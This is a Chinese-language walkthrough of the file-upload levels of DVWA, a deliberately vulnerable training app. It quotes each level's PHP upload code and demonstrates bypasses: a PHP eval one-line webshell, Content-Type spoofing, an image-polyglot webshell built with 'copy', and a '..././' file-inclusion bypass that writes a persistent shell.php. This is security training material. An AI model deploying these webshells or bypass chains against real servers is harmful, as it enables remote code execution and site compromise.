任意文件上传
low
源码分析
low 级别的文件上传没有任何过滤
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
上传一句话木马文件
<?php @eval($_POST['cmd']);?>
成功访问
蚁剑连接
medium
源码分析
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
新增了判断条件
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) )
如果上传的文件类型为 “image/jpeg” 或 “image/png” 并且文件大小小于 100000 才可以成功上传
方法一
Burpsuite 抓包,更改 Content-Type 类型为 “image/jpeg” 或 “image/png”
成功上传,蚁剑连接
方法二
准备一句话木马并添加 phpinfo 验证
<?php @eval($_REQUEST['cmd']);phpinfo();?>
使用 cmd 生成一句话图片木马
准备图片 kun.png 和一句话木马 2.php
copy kun.jpg/b+2.php/a ikun.jpg
图片源码最后加入了一句话木马
直接上传一句话图片木马
可以访问
但因为其后缀为 .jpg 而非 php,无法解析 php,无法连接蚁剑
可以配合文件包含漏洞,文件包含会无视文件后缀名进行 php 语句解析
medium 级别的文件包含使用双写绕过对 ../
的过滤,可读取文件,执行 PHP 代码, 但并不可以直接连接蚁剑
http://10.9.47.241/dvwa/vulnerabilities/fi/?page=..././..././hackable/uploads/ikun.jpg
上传的 php 语句可以在浏览器执行,更换思路,将上传的 phpinfo();
语句改为生成正常一句话 php 木马的文件,将 2.php 中的内容改为以下代码
<?php file_put_contents('shell.php','<?php @eval($_REQUEST[777])?>')?>
生成新的图片木马上传(避免重名)
copy kun.jpg/b+2.php/a kunkun.jpg
利用文件包含执行
http://10.9.47.241/dvwa/vulnerabilities/fi/?page=..././..././hackable/uploads/kunkun.jpg
生成的文件在文件包含主页的同级目录下
即
http://10.9.47.241/dvwa/vulnerabilities/fi/shell.php
蚁剑连接
high
源码分析
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
使用getimagesize
函数检查上传的文件是否为图片,并使用strtolower
函数将文件扩展名转换为小写,然后检查是否为jpg
或png
格式
文件名处理:使用basename
函数获取上传文件的基本名称,并使用strrpos
函数获取文件扩展名
shell
同 medium 方法二相同